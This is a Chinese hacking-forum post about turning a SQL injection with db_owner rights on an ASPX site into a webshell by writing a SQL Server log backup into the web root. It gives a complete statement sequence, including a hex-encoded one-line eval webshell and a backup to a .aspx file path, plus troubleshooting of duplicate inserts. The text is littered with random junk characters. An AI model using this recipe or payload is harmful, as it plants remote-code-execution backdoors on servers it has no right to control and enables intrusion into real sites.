最近在看个网站的时候,aspx的字符型注点,db_owner权限,但是不支持asp,常见的方法是log备份asp,这次我们要备份aspx了(在这只讨论备份)。- e7 }' l- O5 Q! r% ^- F
但是直接写一句话虽然可以备份成功,但是执行时会报错,因此直接备份的一句话是无法执行的。
( ~% c0 x! f) ]0 d3 [3 t经过查找资料和本人测试发现,利用ie备份的时候,insert时,向表中插入内容,都是重复插入3条数据(ie6,ie8均如此),因此导致执行时出错;利用查询分析器insert的时候,只插入一条数据,因此不会报错,所以一句话成功执行。
. B: a3 B: i5 l9 R2 S; ]+ d经测试,备份如下格式:空格一句话空格、<br>一句话<br>时,有一定概率可以成功。不知道是什么原因,特来论坛请教,望高手解惑。 O* z: M2 J8 w6 ^* O2 t# w
. ]$ P) x+ Q9 z' G. x
--------------------------------------------------------------1 t$ ?1 \0 [8 `2 l: o
今天又试了下,发现直接备份有时候也可以成功,晕死了,为防止备份时插入多条内容导致出错,
' Q$ x. F7 g9 }1 j. F- m- ~; L自己修改备份语句如下:
" e9 v* }9 o9 O" Y8 |( {Drop table cmd;--( C* [; k( W3 A' J
alter database db_test set RECOVERY FULL;--& O K+ y0 g" s9 {# f
create table cmd (a image,id int IDENTITY (1,1)); --添加了个自动编号的字段: u- l! L' Z" \* C) Y
backup log db_test to disk = 'c:\bak' with init;--+ c+ e8 R2 l0 G% J5 Q; ?
insert into cmd (a) values(0x3C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B227A225D2C22756E7361666522293B253E);--
1 F; ?9 _* K" l+ s. E' J, ?- p, Y$ j: Kdelete from cmd where id>1;--删除id>1的数据+ e- G3 z+ x( b0 Z/ n
backup log db_test to disk = 'e:\webroot\test.aspx';--% q9 d$ x/ B v5 {. o& N9 {
Drop table cmd;--2 W) M1 I4 U2 c$ f
希望对大家有用。 |